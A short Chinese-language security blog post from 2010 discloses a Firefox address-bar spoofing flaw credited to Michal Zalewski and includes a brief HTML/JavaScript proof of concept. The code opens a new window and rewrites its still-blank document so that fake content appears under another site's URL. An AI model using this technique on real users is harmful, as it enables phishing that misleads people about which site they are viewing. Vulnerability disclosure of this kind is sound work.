首页 > 安全新闻, 编程溢出 > Firefox [address bar] 钓鱼欺骗漏洞

Firefox [address bar] 钓鱼欺骗漏洞

2010年6月27日 spookzang 发表评论 阅读评论

发现者:Michal Zalewski

问题出在浏览器打开新窗口时,这时的document是 about:blank,但是出于用户体验,浏览器的address bar会写入目标地址,可是 blank的document是可以被当前页面修改的,从而产生了这个钓鱼漏洞。

漏洞测试代码(程序):

1
2
3
4
5
6
7
8

<input type=submit value="Click me!" onclick="clicked()">
<script>
var w;
function clicked() {
w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1");
setTimeout('w.document.body.innerHTML = "Fake content!";w.stop();', 500);
}
</script>

分类: 安全新闻, 编程溢出 标签: , , ,
  1. twinhorse
    2010年6月27日12:29 | #1
    回复 | 引用

    沙发

  1. 本文目前尚无任何 trackbacks 和 pingbacks.